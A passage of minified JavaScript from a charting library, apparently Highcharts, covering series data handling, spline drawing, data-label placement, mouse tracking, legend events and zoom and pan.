axisTypes:["xAxis","yAxis"],colorCounter:0,parallelArrays:["x","y"],init:function(a,b){var c=this,d,e,f=a.series,g=function(a,b){return r(a.options.index,a._i)-r(b.options.index,b._i)};c.chart=a;c.options=b=c.setOptions(b);c.linkedSeries=[];c.bindAxes();t(c,{name:b.name,state:"",pointAttr:{},visible:!1!==b.visible,selected:!0===b.selected});da&&(b.animation=!1);e=b.events;for(d in e)N(c,d,e[d]);if(e&&e.click||b.point&&b.point.events&&b.point.events.click||b.allowPointSelect)a.runTrackerClick=!0;c.getColor();
c.getSymbol();s(c.parallelArrays,function(a){c[a+"Data"]=[]});c.setData(b.data,!1);c.isCartesian&&(a.hasCartesianSeries=!0);f.push(c);c._i=f.length-1;fb(f,g);this.yAxis&&fb(this.yAxis.series,g);s(f,function(a,b){a.index=b;a.name=a.name||"Series "+(b+1)})},bindAxes:function(){var a=this,b=a.options,c=a.chart,d;s(a.axisTypes||[],function(e){s(c[e],function(c){d=c.options;if(b[e]===d.index||b[e]!==v&&b[e]===d.id||b[e]===v&&0===d.index)c.series.push(a),a[e]=c,c.isDirty=!0});a[e]||a.optionalAxis===e||
fa(18,!0)})},updateParallelArrays:function(a,b){var c=a.series,d=arguments;s(c.parallelArrays,"number"===typeof b?function(d){var f="y"===d&&c.toYData?c.toYData(a):a[d];c[d+"Data"][b]=f}:function(a){Array.prototype[b].apply(c[a+"Data"],Array.prototype.slice.call(d,2))})},autoIncrement:function(){var a=this.options,b=this.xIncrement,b=r(b,a.pointStart,0);this.pointInterval=r(this.pointInterval,a.pointInterval,1);this.xIncrement=b+this.pointInterval;return b},getSegments:function(){var a=-1,b=[],c,
d=this.points,e=d.length;if(e)if(this.options.connectNulls){for(c=e;c--;)null===d[c].y&&d.splice(c,1);d.length&&(b=[d])}else s(d,function(c,g){null===c.y?(g>a+1&&b.push(d.slice(a+1,g)),a=g):g===e-1&&b.push(d.slice(a+1,g+1))});this.segments=b},setOptions:function(a){var b=this.chart,c=b.options.plotOptions,b=b.userOptions||{},d=b.plotOptions||{},e=c[this.type];this.userOptions=a;c=E(e,c.series,a);this.tooltipOptions=E(I.tooltip,I.plotOptions[this.type].tooltip,b.tooltip,d.series&&d.series.tooltip,
d[this.type]&&d[this.type].tooltip,a.tooltip);null===e.marker&&delete c.marker;return c},getColor:function(){var a=this.options,b=this.userOptions,c=this.chart.options.colors,d=this.chart.counters,e;e=a.color||za[this.type].color;e||a.colorByPoint||(u(b._colorIndex)?a=b._colorIndex:(b._colorIndex=d.color,a=d.color++),e=c[a]);this.color=e;d.wrapColor(c.length)},getSymbol:function(){var a=this.userOptions,b=this.options.marker,c=this.chart,d=c.options.symbols,c=c.counters;this.symbol=b.symbol;this.symbol||
(u(a._symbolIndex)?a=a._symbolIndex:(a._symbolIndex=c.symbol,a=c.symbol++),this.symbol=d[a]);/^url/.test(this.symbol)&&(b.radius=0);c.wrapSymbol(d.length)},drawLegendSymbol:Vb.drawLineMarker,setData:function(a,b,c,d){var e=this,f=e.points,g=f&&f.length||0,h,k=e.options,l=e.chart,m=null,n=e.xAxis,q=n&&!!n.categories,p=e.tooltipPoints,w=k.turboThreshold,u=this.xData,t=this.yData,x=(h=e.pointArrayMap)&&h.length;a=a||[];h=a.length;b=r(b,!0);if(!1===d||!h||g!==h||e.cropped||e.hasGroupedData){e.xIncrement=
null;e.pointRange=q?1:k.pointRange;e.colorCounter=0;s(this.parallelArrays,function(a){e[a+"Data"].length=0});if(w&&h>w){for(c=0;null===m&&c<h;)m=a[c],c++;if($(m)){q=r(k.pointStart,0);k=r(k.pointInterval,1);for(c=0;c<h;c++)u[c]=q,t[c]=a[c],q+=k;e.xIncrement=q}else if(ka(m))if(x)for(c=0;c<h;c++)k=a[c],u[c]=k[0],t[c]=k.slice(1,x+1);else for(c=0;c<h;c++)k=a[c],u[c]=k[0],t[c]=k[1];else fa(12)}else for(c=0;c<h;c++)a[c]!==v&&(k={series:e},e.pointClass.prototype.applyOptions.apply(k,[a[c]]),e.updateParallelArrays(k,
c),q&&k.name&&(n.names[k.x]=k.name));U(t[0])&&fa(14,!0);e.data=[];e.options.data=a;for(c=g;c--;)f[c]&&f[c].destroy&&f[c].destroy();p&&(p.length=0);n&&(n.minRange=n.userMinRange);e.isDirty=e.isDirtyData=l.isDirtyBox=!0;c=!1}else s(a,function(a,b){f[b].update(a,!1)});b&&l.redraw(c)},processData:function(a){var b=this.xData,c=this.yData,d=b.length,e;e=0;var f,g,h=this.xAxis,k=this.options,l=k.cropThreshold,m=0,n=this.isCartesian,q,p;if(n&&!(this.isDirty||h.isDirty||this.yAxis.isDirty||a))return!1;if(n&&
this.sorted&&(!l||d>l||this.forceCrop))if(q=h.min,p=h.max,b[d-1]<q||b[0]>p)b=[],c=[];else if(b[0]<q||b[d-1]>p)e=this.cropData(this.xData,this.yData,q,p),b=e.xData,c=e.yData,e=e.start,f=!0,m=b.length;for(d=b.length-1;0<=d;d--)a=b[d]-b[d-1],!f&&b[d]>q&&b[d]<p&&m++,0<a&&(g===v||a<g)?g=a:0>a&&this.requireSorting&&fa(15);this.cropped=f;this.cropStart=e;this.processedXData=b;this.processedYData=c;this.activePointCount=m;null===k.pointRange&&(this.pointRange=g||1);this.closestPointRange=g},cropData:function(a,
b,c,d){var e=a.length,f=0,g=e,h=r(this.cropShoulder,1),k;for(k=0;k<e;k++)if(a[k]>=c){f=x(0,k-h);break}for(;k<e;k++)if(a[k]>d){g=k+h;break}return{xData:a.slice(f,g),yData:b.slice(f,g),start:f,end:g}},generatePoints:function(){var a=this.options.data,b=this.data,c,d=this.processedXData,e=this.processedYData,f=this.pointClass,g=d.length,h=this.cropStart||0,k,l=this.hasGroupedData,m,n=[],q;b||l||(b=[],b.length=a.length,b=this.data=b);for(q=0;q<g;q++)k=h+q,l?n[q]=(new f).init(this,[d[q]].concat(ha(e[q]))):
(b[k]?m=b[k]:a[k]!==v&&(b[k]=m=(new f).init(this,a[k],d[q])),n[q]=m);if(b&&(g!==(c=b.length)||l))for(q=0;q<c;q++)q!==h||l||(q+=g),b[q]&&(b[q].destroyElements(),b[q].plotX=v);this.data=b;this.points=n},getExtremes:function(a){var b=this.yAxis,c=this.processedXData,d,e=[],f=0;d=this.xAxis.getExtremes();var g=d.min,h=d.max,k,l,m,n;a=a||this.stackedYData||this.processedYData;d=a.length;for(n=0;n<d;n++)if(l=c[n],m=a[n],k=null!==m&&m!==v&&(!b.isLog||m.length||0<m),l=this.getExtremesFromAll||this.cropped||
(c[n+1]||l)>=g&&(c[n-1]||l)<=h,k&&l)if(k=m.length)for(;k--;)null!==m[k]&&(e[f++]=m[k]);else e[f++]=m;this.dataMin=r(void 0,va(e));this.dataMax=r(void 0,la(e))},translate:function(){this.processedXData||this.processData();this.generatePoints();for(var a=this.options,b=a.stacking,c=this.xAxis,d=c.categories,e=this.yAxis,f=this.points,g=f.length,h=!!this.modifyValue,k=a.pointPlacement,l="between"===k||$(k),m=a.threshold,a=0;a<g;a++){var n=f[a],q=n.x,p=n.y,s=n.low,t=b&&e.stacks[(this.negStacks&&p<m?"-":
"")+this.stackKey];e.isLog&&0>=p&&(n.y=p=null);n.plotX=c.translate(q,0,0,0,1,k,"flags"===this.type);b&&this.visible&&t&&t[q]&&(t=t[q],p=t.points[this.index+","+a],s=p[0],p=p[1],0===s&&(s=r(m,e.min)),e.isLog&&0>=s&&(s=null),n.total=n.stackTotal=t.total,n.percentage=t.total&&n.y/t.total*100,n.stackY=p,t.setOffset(this.pointXOffset||0,this.barW||0));n.yBottom=u(s)?e.translate(s,0,1,0,1):null;h&&(p=this.modifyValue(p,n));n.plotY="number"===typeof p&&Infinity!==p?e.translate(p,0,1,0,1):v;n.clientX=l?c.translate(q,
0,0,0,1):n.plotX;n.negative=n.y<(m||0);n.category=d&&d[n.x]!==v?d[n.x]:n.x}this.getSegments()},animate:function(a){var b=this.chart,c=b.renderer,d;d=this.options.animation;var e=this.clipBox||b.clipBox,f=b.inverted,g;d&&!V(d)&&(d=za[this.type].animation);g=["_sharedClip",d.duration,d.easing,e.height].join();a?(a=b[g],d=b[g+"m"],a||(b[g]=a=c.clipRect(t(e,{width:0})),b[g+"m"]=d=c.clipRect(-99,f?-b.plotLeft:-b.plotTop,99,f?b.chartWidth:b.chartHeight)),this.group.clip(a),this.markerGroup.clip(d),this.sharedClipKey=
g):((a=b[g])&&a.animate({width:b.plotSizeX},d),b[g+"m"]&&b[g+"m"].animate({width:b.plotSizeX+99},d),this.animate=null)},afterAnimate:function(){var a=this.chart,b=this.sharedClipKey,c=this.group,d=this.clipBox;c&&!1!==this.options.clip&&(b&&d||c.clip(d?a.renderer.clipRect(d):a.clipRect),this.markerGroup.clip());C(this,"afterAnimate");setTimeout(function(){b&&a[b]&&(d||(a[b]=a[b].destroy()),a[b+"m"]&&(a[b+"m"]=a[b+"m"].destroy()))},100)},drawPoints:function(){var a,b=this.points,c=this.chart,d,e,f,
g,h,k,l,m;d=this.options.marker;var n=this.pointAttr[""],q,p=this.markerGroup,s=r(d.enabled,this.activePointCount<0.5*this.xAxis.len/d.radius);if(!1!==d.enabled||this._hasPointMarkers)for(f=b.length;f--;)g=b[f],d=F(g.plotX),e=g.plotY,m=g.graphic,k=g.marker||{},a=s&&k.enabled===v||k.enabled,q=c.isInsidePlot(z(d),e,c.inverted),a&&e!==v&&!isNaN(e)&&null!==g.y?(a=g.pointAttr[g.selected?"select":""]||n,h=a.r,k=r(k.symbol,this.symbol),l=0===k.indexOf("url"),m?m[q?"show":"hide"](!0).animate(t({x:d-h,y:e-
h},m.symbolName?{width:2*h,height:2*h}:{})):q&&(0<h||l)&&(g.graphic=c.renderer.symbol(k,d-h,e-h,2*h,2*h).attr(a).add(p))):m&&(g.graphic=m.destroy())},convertAttribs:function(a,b,c,d){var e=this.pointAttrToOptions,f,g,h={};a=a||{};b=b||{};c=c||{};d=d||{};for(f in e)g=e[f],h[f]=r(a[g],b[f],c[f],d[f]);return h},getAttribs:function(){var a=this,b=a.options,c=za[a.type].marker?b.marker:b,d=c.states,e=d.hover,f,g=a.color;f={stroke:g,fill:g};var h=a.points||[],k,l=[],m,n=a.pointAttrToOptions;m=a.hasPointSpecificOptions;
var q=b.negativeColor,p=c.lineColor,r=c.fillColor;k=b.turboThreshold;var v;b.marker?(e.radius=e.radius||c.radius+2,e.lineWidth=e.lineWidth||c.lineWidth+1):e.color=e.color||Aa(e.color||g).brighten(e.brightness).get();l[""]=a.convertAttribs(c,f);s(["hover","select"],function(b){l[b]=a.convertAttribs(d[b],l[""])});a.pointAttr=l;g=h.length;if(!k||g<k||m)for(;g--;){k=h[g];(c=k.options&&k.options.marker||k.options)&&!1===c.enabled&&(c.radius=0);k.negative&&q&&(k.color=k.fillColor=q);m=b.colorByPoint||k.color;
if(k.options)for(v in n)u(c[n[v]])&&(m=!0);m?(c=c||{},m=[],d=c.states||{},f=d.hover=d.hover||{},b.marker||(f.color=f.color||!k.options.color&&e.color||Aa(k.color).brighten(f.brightness||e.brightness).get()),f={color:k.color},r||(f.fillColor=k.color),p||(f.lineColor=k.color),m[""]=a.convertAttribs(t(f,c),l[""]),m.hover=a.convertAttribs(d.hover,l.hover,m[""]),m.select=a.convertAttribs(d.select,l.select,m[""])):m=l;k.pointAttr=m}},destroy:function(){var a=this,b=a.chart,c=/AppleWebKit\/533/.test(ma),
d,e,f=a.data||[],g,h,k;C(a,"destroy");T(a);s(a.axisTypes||[],function(b){if(k=a[b])oa(k.series,a),k.isDirty=k.forceRedraw=!0});a.legendItem&&a.chart.legend.destroyItem(a);for(e=f.length;e--;)(g=f[e])&&g.destroy&&g.destroy();a.points=null;clearTimeout(a.animationTimeout);s("area graph dataLabelsGroup group markerGroup tracker graphNeg areaNeg posClip negClip".split(" "),function(b){a[b]&&(d=c&&"group"===b?"hide":"destroy",a[b][d]())});b.hoverSeries===a&&(b.hoverSeries=null);oa(b.series,a);for(h in a)delete a[h]},
getSegmentPath:function(a){var b=this,c=[],d=b.options.step;s(a,function(e,f){var g=e.plotX,h=e.plotY,k;b.getPointSpline?c.push.apply(c,b.getPointSpline(a,e,f)):(c.push(f?"L":"M"),d&&f&&(k=a[f-1],"right"===d?c.push(k.plotX,h):"center"===d?c.push((k.plotX+g)/2,k.plotY,(k.plotX+g)/2,h):c.push(g,k.plotY)),c.push(e.plotX,e.plotY))});return c},getGraphPath:function(){var a=this,b=[],c,d=[];s(a.segments,function(e){c=a.getSegmentPath(e);1<e.length?b=b.concat(c):d.push(e[0])});a.singlePoints=d;return a.graphPath=
b},drawGraph:function(){var a=this,b=this.options,c=[["graph",b.lineColor||this.color]],d=b.lineWidth,e=b.dashStyle,f="square"!==b.linecap,g=this.getGraphPath(),h=b.negativeColor;h&&c.push(["graphNeg",h]);s(c,function(c,h){var m=c[0],n=a[m];n?(Ya(n),n.animate({d:g})):d&&g.length&&(n={stroke:c[1],"stroke-width":d,fill:ca,zIndex:1},e?n.dashstyle=e:f&&(n["stroke-linecap"]=n["stroke-linejoin"]="round"),a[m]=a.chart.renderer.path(g).attr(n).add(a.group).shadow(!h&&b.shadow))})},clipNeg:function(){var a=
this.options,b=this.chart,c=b.renderer,d=a.negativeColor||a.negativeFillColor,e,f=this.graph,g=this.area,h=this.posClip,k=this.negClip;e=b.chartWidth;var l=b.chartHeight,m=x(e,l),n=this.yAxis;d&&(f||g)&&(d=z(n.toPixels(a.threshold||0,!0)),0>d&&(m-=d),a={x:0,y:0,width:m,height:d},m={x:0,y:d,width:m,height:m},b.inverted&&(a.height=m.y=b.plotWidth-d,c.isVML&&(a={x:b.plotWidth-d-b.plotLeft,y:0,width:e,height:l},m={x:d+b.plotLeft-e,y:0,width:b.plotLeft+d,height:e})),n.reversed?(b=m,e=a):(b=a,e=m),h?(h.animate(b),
k.animate(e)):(this.posClip=h=c.clipRect(b),this.negClip=k=c.clipRect(e),f&&this.graphNeg&&(f.clip(h),this.graphNeg.clip(k)),g&&(g.clip(h),this.areaNeg.clip(k))))},invertGroups:function(){function a(){var a={width:b.yAxis.len,height:b.xAxis.len};s(["group","markerGroup"],function(c){b[c]&&b[c].attr(a).invert()})}var b=this,c=b.chart;b.xAxis&&(N(c,"resize",a),N(b,"destroy",function(){T(c,"resize",a)}),a(),b.invertGroups=a)},plotGroup:function(a,b,c,d,e){var f=this[a],g=!f;g&&(this[a]=f=this.chart.renderer.g(b).attr({visibility:c,
zIndex:d||0.1}).add(e));f[g?"attr":"animate"](this.getPlotBox());return f},getPlotBox:function(){var a=this.chart,b=this.xAxis,c=this.yAxis;a.inverted&&(b=c,c=this.xAxis);return{translateX:b?b.left:a.plotLeft,translateY:c?c.top:a.plotTop,scaleX:1,scaleY:1}},render:function(){var a=this,b=a.chart,c,d=a.options,e=(c=d.animation)&&!!a.animate&&b.renderer.isSVG&&r(c.duration,500)||0,f=a.visible?"visible":"hidden",g=d.zIndex,h=a.hasRendered,k=b.seriesGroup;c=a.plotGroup("group","series",f,g,k);a.markerGroup=
a.plotGroup("markerGroup","markers",f,g,k);e&&a.animate(!0);a.getAttribs();c.inverted=a.isCartesian?b.inverted:!1;a.drawGraph&&(a.drawGraph(),a.clipNeg());a.drawDataLabels&&a.drawDataLabels();a.visible&&a.drawPoints();a.drawTracker&&!1!==a.options.enableMouseTracking&&a.drawTracker();b.inverted&&a.invertGroups();!1===d.clip||a.sharedClipKey||h||c.clip(b.clipRect);e&&a.animate();h||(e?a.animationTimeout=setTimeout(function(){a.afterAnimate()},e):a.afterAnimate());a.isDirty=a.isDirtyData=!1;a.hasRendered=
!0},redraw:function(){var a=this.chart,b=this.isDirtyData,c=this.group,d=this.xAxis,e=this.yAxis;c&&(a.inverted&&c.attr({width:a.plotWidth,height:a.plotHeight}),c.animate({translateX:r(d&&d.left,a.plotLeft),translateY:r(e&&e.top,a.plotTop)}));this.translate();this.setTooltipPoints&&this.setTooltipPoints(!0);this.render();b&&C(this,"updatedData")}};var Wb=bb(ga);M.line=Wb;za.spline=E(Rb);var Xb=bb(ga,{type:"spline",getPointSpline:function(a,b,c){var d=b.plotX,e=b.plotY,f=a[c-1],g=a[c+1],h,k,l,m;if(f&&
g){a=f.plotY;l=g.plotX;var g=g.plotY,n;h=(1.5*d+f.plotX)/2.5;k=(1.5*e+a)/2.5;l=(1.5*d+l)/2.5;m=(1.5*e+g)/2.5;n=(m-k)*(l-d)/(l-h)+e-m;k+=n;m+=n;k>a&&k>e?(k=x(a,e),m=2*e-k):k<a&&k<e&&(k=J(a,e),m=2*e-k);m>g&&m>e?(m=x(g,e),k=2*e-m):m<g&&m<e&&(m=J(g,e),k=2*e-m);b.rightContX=l;b.rightContY=m}c?(b=["C",f.rightContX||f.plotX,f.rightContY||f.plotY,h||d,k||e,d,e],f.rightContX=f.rightContY=null):b=["M",d,e];return b}});M.spline=Xb;ga.prototype.drawDataLabels=function(){var a=this,b=a.options,c=b.cursor,d=b.dataLabels,
e=a.points,f,g,h,k;if(d.enabled||a._hasPointLabels)a.dlProcessOptions&&a.dlProcessOptions(d),k=a.plotGroup("dataLabelsGroup","data-labels","hidden",d.zIndex||6),!a.hasRendered&&r(d.defer,!0)&&(k.attr({opacity:0}),N(a,"afterAnimate",function(){a.dataLabelsGroup.show()[b.animation?"animate":"attr"]({opacity:1},{duration:200})})),g=d,s(e,function(b){var e,n=b.dataLabel,q,p,s=b.connector,x=!0;f=b.options&&b.options.dataLabels;e=r(f&&f.enabled,g.enabled);if(n&&!e)b.dataLabel=n.destroy();else if(e){d=E(g,
f);e=d.rotation;q=b.getLabelConfig();h=d.format?ua(d.format,q):d.formatter.call(q,d);d.style.color=r(d.color,d.style.color,a.color,"black");if(n)u(h)?(n.attr({text:h}),x=!1):(b.dataLabel=n=n.destroy(),s&&(b.connector=s.destroy()));else if(u(h)){n={fill:d.backgroundColor,stroke:d.borderColor,"stroke-width":d.borderWidth,r:d.borderRadius||0,rotation:e,padding:d.padding,zIndex:1};for(p in n)n[p]===v&&delete n[p];n=b.dataLabel=a.chart.renderer[e?"text":"label"](h,0,-999,null,null,null,d.useHTML).attr(n).css(t(d.style,
c&&{cursor:c})).add(k).shadow(d.shadow)}n&&a.alignDataLabel(b,n,d,null,x)}})};ga.prototype.alignDataLabel=function(a,b,c,d,e){var f=this.chart,g=f.inverted,h=r(a.plotX,-999),k=r(a.plotY,-999),l=b.getBBox();if(a=this.visible&&(a.series.forceDL||f.isInsidePlot(h,z(k),g)||d&&f.isInsidePlot(h,g?d.x+1:d.y+d.height-1,g)))d=t({x:g?f.plotWidth-k:h,y:z(g?f.plotHeight-h:k),width:0,height:0},d),t(c,{width:l.width,height:l.height}),c.rotation?(g={align:c.align,x:d.x+c.x+d.width/2,y:d.y+c.y+d.height/2},b[e?"attr":
"animate"](g)):(b.align(c,null,d),g=b.alignAttr,"justify"===r(c.overflow,"justify")?this.justifyDataLabel(b,c,g,l,d,e):r(c.crop,!0)&&(a=f.isInsidePlot(g.x,g.y)&&f.isInsidePlot(g.x+l.width,g.y+l.height)));a||(b.attr({y:-999}),b.placed=!1)};ga.prototype.justifyDataLabel=function(a,b,c,d,e,f){var g=this.chart,h=b.align,k=b.verticalAlign,l,m;l=c.x;0>l&&("right"===h?b.align="left":b.x=-l,m=!0);l=c.x+d.width;l>g.plotWidth&&("left"===h?b.align="right":b.x=g.plotWidth-l,m=!0);l=c.y;0>l&&("bottom"===k?b.verticalAlign=
"top":b.y=-l,m=!0);l=c.y+d.height;l>g.plotHeight&&("top"===k?b.verticalAlign="bottom":b.y=g.plotHeight-l,m=!0);m&&(a.placed=!f,a.align(b,null,e))};M.pie&&(M.pie.prototype.drawDataLabels=function(){var a=this,b=a.data,c,d=a.chart,e=a.options.dataLabels,f=r(e.connectorPadding,10),g=r(e.connectorWidth,1),h=d.plotWidth,d=d.plotHeight,k,l,m=r(e.softConnector,!0),n=e.distance,q=a.center,p=q[2]/2,w=q[1],t=0<n,u,v,y,B,E=[[],[]],A,C,H,L,D,G=[0,0,0,0],N=function(a,b){return b.y-a.y};if(a.visible&&(e.enabled||
a._hasPointLabels)){ga.prototype.drawDataLabels.apply(a);s(b,function(a){a.dataLabel&&a.visible&&E[a.half].push(a)});for(L=0;!B&&b[L];)B=b[L]&&b[L].dataLabel&&(b[L].dataLabel.getBBox().height||21),L++;for(L=2;L--;){var b=[],aa=[],I=E[L],J=I.length,F;a.sortByAngle(I,L-0.5);if(0<n){for(D=w-p-n;D<=w+p+n;D+=B)b.push(D);v=b.length;if(J>v){c=[].concat(I);c.sort(N);for(D=J;D--;)c[D].rank=D;for(D=J;D--;)I[D].rank>=v&&I.splice(D,1);J=I.length}for(D=0;D<J;D++){c=I[D];y=c.labelPos;c=9999;var O,M;for(M=0;M<v;M++)O=
R(b[M]-y[1]),O<c&&(c=O,F=M);if(F<D&&null!==b[D])F=D;else for(v<J-D+F&&null!==b[D]&&(F=v-J+D);null===b[F];)F++;aa.push({i:F,y:b[F]});b[F]=null}aa.sort(N)}for(D=0;D<J;D++){c=I[D];y=c.labelPos;u=c.dataLabel;H=!1===c.visible?"hidden":"visible";c=y[1];if(0<n){if(v=aa.pop(),F=v.i,C=v.y,c>C&&null!==b[F+1]||c<C&&null!==b[F-1])C=c}else C=c;A=e.justify?q[0]+(L?-1:1)*(p+n):a.getX(0===F||F===b.length-1?c:C,L);u._attr={visibility:H,align:y[6]};u._pos={x:A+e.x+({left:f,right:-f}[y[6]]||0),y:C+e.y-10};u.connX=A;
u.connY=C;null===this.options.size&&(v=u.width,A-v<f?G[3]=x(z(v-A+f),G[3]):A+v>h-f&&(G[1]=x(z(A+v-h+f),G[1])),0>C-B/2?G[0]=x(z(-C+B/2),G[0]):C+B/2>d&&(G[2]=x(z(C+B/2-d),G[2])))}}if(0===la(G)||this.verifyDataLabelOverflow(G))this.placeDataLabels(),t&&g&&s(this.points,function(b){k=b.connector;y=b.labelPos;(u=b.dataLabel)&&u._pos?(H=u._attr.visibility,A=u.connX,C=u.connY,l=m?["M",A+("left"===y[6]?5:-5),C,"C",A,C,2*y[2]-y[4],2*y[3]-y[5],y[2],y[3],"L",y[4],y[5]]:["M",A+("left"===y[6]?5:-5),C,"L",y[2],
y[3],"L",y[4],y[5]],k?(k.animate({d:l}),k.attr("visibility",H)):b.connector=k=a.chart.renderer.path(l).attr({"stroke-width":g,stroke:e.connectorColor||b.color||"#606060",visibility:H}).add(a.dataLabelsGroup)):k&&(b.connector=k.destroy())})}},M.pie.prototype.placeDataLabels=function(){s(this.points,function(a){a=a.dataLabel;var b;a&&((b=a._pos)?(a.attr(a._attr),a[a.moved?"animate":"attr"](b),a.moved=!0):a&&a.attr({y:-999}))})},M.pie.prototype.alignDataLabel=Lb,M.pie.prototype.verifyDataLabelOverflow=
function(a){var b=this.center,c=this.options,d=c.center,e=c=c.minSize||80,f;null!==d[0]?e=x(b[2]-x(a[1],a[3]),c):(e=x(b[2]-a[1]-a[3],c),b[0]+=(a[3]-a[1])/2);null!==d[1]?e=x(J(e,b[2]-x(a[0],a[2])),c):(e=x(J(e,b[2]-a[0]-a[2]),c),b[1]+=(a[0]-a[2])/2);e<b[2]?(b[2]=e,this.translate(b),s(this.points,function(a){a.dataLabel&&(a.dataLabel._pos=null)}),this.drawDataLabels&&this.drawDataLabels()):f=!0;return f});M.column&&(M.column.prototype.alignDataLabel=function(a,b,c,d,e){var f=this.chart,g=f.inverted,
h=a.dlBox||a.shapeArgs,k=a.below||a.plotY>r(this.translatedThreshold,f.plotSizeY),l=r(c.inside,!!this.options.stacking);h&&(d=E(h),g&&(d={x:f.plotWidth-d.y-d.height,y:f.plotHeight-d.x-d.width,width:d.height,height:d.width}),l||(g?(d.x+=k?0:d.width,d.width=0):(d.y+=k?d.height:0,d.height=0)));c.align=r(c.align,!g||l?"center":k?"right":"left");c.verticalAlign=r(c.verticalAlign,g||l?"middle":k?"top":"bottom");ga.prototype.alignDataLabel.call(this,a,b,c,d,e)});var ab=S.TrackerMixin={drawTrackerPoint:function(){var a=
this,b=a.chart,c=b.pointer,d=a.options.cursor,e=d&&{cursor:d},f=function(c){var d=c.target,e;if(b.hoverSeries!==a)a.onMouseOver();for(;d&&!e;)e=d.point,d=d.parentNode;if(e!==v&&e!==b.hoverPoint)e.onMouseOver(c)};s(a.points,function(a){a.graphic&&(a.graphic.element.point=a);a.dataLabel&&(a.dataLabel.element.point=a)});a._hasTracking||(s(a.trackerGroups,function(b){if(a[b]&&(a[b].addClass("highcharts-tracker").on("mouseover",f).on("mouseout",function(a){c.onTrackerMouseOut(a)}).css(e),Ga))a[b].on("touchstart",
f)}),a._hasTracking=!0)},drawTrackerGraph:function(){var a=this,b=a.options,c=b.trackByArea,d=[].concat(c?a.areaPath:a.graphPath),e=d.length,f=a.chart,g=f.pointer,h=f.renderer,k=f.options.tooltip.snap,l=a.tracker,m=b.cursor,n=m&&{cursor:m},m=a.singlePoints,q,p=function(){if(f.hoverSeries!==a)a.onMouseOver()},r="rgba(192,192,192,"+(ba?1E-4:0.002)+")";if(e&&!c)for(q=e+1;q--;)"M"===d[q]&&d.splice(q+1,0,d[q+1]-k,d[q+2],"L"),(q&&"M"===d[q]||q===e)&&d.splice(q,0,"L",d[q-2]+k,d[q-1]);for(q=0;q<m.length;q++)e=
m[q],d.push("M",e.plotX-k,e.plotY,"L",e.plotX+k,e.plotY);l?l.attr({d:d}):(a.tracker=h.path(d).attr({"stroke-linejoin":"round",visibility:a.visible?"visible":"hidden",stroke:r,fill:c?r:ca,"stroke-width":b.lineWidth+(c?0:2*k),zIndex:2}).add(a.group),s([a.tracker,a.markerGroup],function(a){a.addClass("highcharts-tracker").on("mouseover",p).on("mouseout",function(a){g.onTrackerMouseOut(a)}).css(n);if(Ga)a.on("touchstart",p)}))}};M.column&&(ColumnSeries.prototype.drawTracker=ab.drawTrackerPoint);M.pie&&
(M.pie.prototype.drawTracker=ab.drawTrackerPoint);M.scatter&&(ScatterSeries.prototype.drawTracker=ab.drawTrackerPoint);t($a.prototype,{setItemEvents:function(a,b,c,d,e){var f=this;(c?b:a.legendGroup).on("mouseover",function(){a.setState("hover");b.css(f.options.itemHoverStyle)}).on("mouseout",function(){b.css(a.visible?d:e);a.setState()}).on("click",function(b){var c=function(){a.setVisible()};b={browserEvent:b};a.firePointEvent?a.firePointEvent("legendItemClick",b,c):C(a,"legendItemClick",b,c)})},
createCheckboxForItem:function(a){a.checkbox=ta("input",{type:"checkbox",checked:a.selected,defaultChecked:a.selected},this.options.itemCheckboxStyle,this.chart.container);N(a.checkbox,"click",function(b){C(a,"checkboxClick",{checked:b.target.checked},function(){a.select()})})}});I.legend.itemStyle.cursor="pointer";t(Qa.prototype,{showResetZoom:function(){var a=this,b=I.lang,c=a.options.chart.resetZoomButton,d=c.theme,e=d.states,f="chart"===c.relativeTo?null:"plotBox";this.resetZoomButton=a.renderer.button(b.resetZoom,
null,null,function(){a.zoomOut()},d,e&&e.hover).attr({align:c.position.align,title:b.resetZoomTitle}).add().align(c.position,!1,f)},zoomOut:function(){var a=this;C(a,"selection",{resetSelection:!0},function(){a.zoom()})},zoom:function(a){var b,c=this.pointer,d=!1,e;!a||a.resetSelection?s(this.axes,function(a){b=a.zoom()}):s(a.xAxis.concat(a.yAxis),function(a){var e=a.axis,h=e.isXAxis;if(c[h?"zoomX":"zoomY"]||c[h?"pinchX":"pinchY"])b=e.zoom(a.min,a.max),e.displayBtn&&(d=!0)});e=this.resetZoomButton;
d&&!e?this.showResetZoom():!d&&V(e)&&(this.resetZoomButton=e.destroy());b&&this.redraw(r(this.options.chart.animation,a&&a.animation,100>this.pointCount))},pan:function(a,b){var c=this,d=c.hoverPoints,e;d&&s(d,function(a){a.setState()});s("xy"===b?[1,0]:[1],function(b){var d=a[b?"chartX":"chartY"],h=c[b?"xAxis":"yAxis"][0],k=c[b?"mouseDownX":"mouseDownY"],l=(h.pointRange||0)/2,m=h.getExtremes(),n=h.toValue(k-d,!0)+l,k=h.toValue(k+c[b?"plotWidth":"plotHeight"]-d,!0)-l;h.series.length&&n>J(m.dataMin,
m.min)&&k<x(m.dataMax,m.max)&&(h.setExtremes(n,k,!1,!1,{trigger:"pan"}),e=!0);c[b?"mouseDownX":"mouseDownY"]=d});e&&c.redraw(!1);X(c.container,{cursor:"move"})}});t(Ja.prototype,{select:function(a,b){var c=this,d=c.series,e=d.chart;a=r(a,!c.selected);c.firePointEvent(a?"select":"unselect",{accumulate:b},function(){c.selected=c.options.selected=a;d.options.data[Wa(c,d.data)]=c.options;c.setState(a&&"select");b||s(e.getSelectedPoints(),function(a){a.selected&&a!==c&&(a.selected=a.options.selected=!1,
d.options.data[Wa(a,d.data)]=a.options,a.setState(""),a.firePointEvent("unselect"))})})},onMouseOver:function(a){var b=this.series,c=b.chart,d=c.tooltip,e=c.hoverPoint;if(e&&e!==this)e.onMouseOut();this.firePointEvent("mouseOver");!d||d.shared&&!b.noSharedTooltip||d.refresh(this,a);this.setState("hover");c.hoverPoint=this},onMouseOut:function(){var a=this.series.chart,b=a.hoverPoints;b&&-1!==Wa(this,b)||(this.firePointEvent("mouseOut"),this.setState(),a.hoverPoint=null)},importEvents:function(){if(!this.hasImportedEvents){var a=
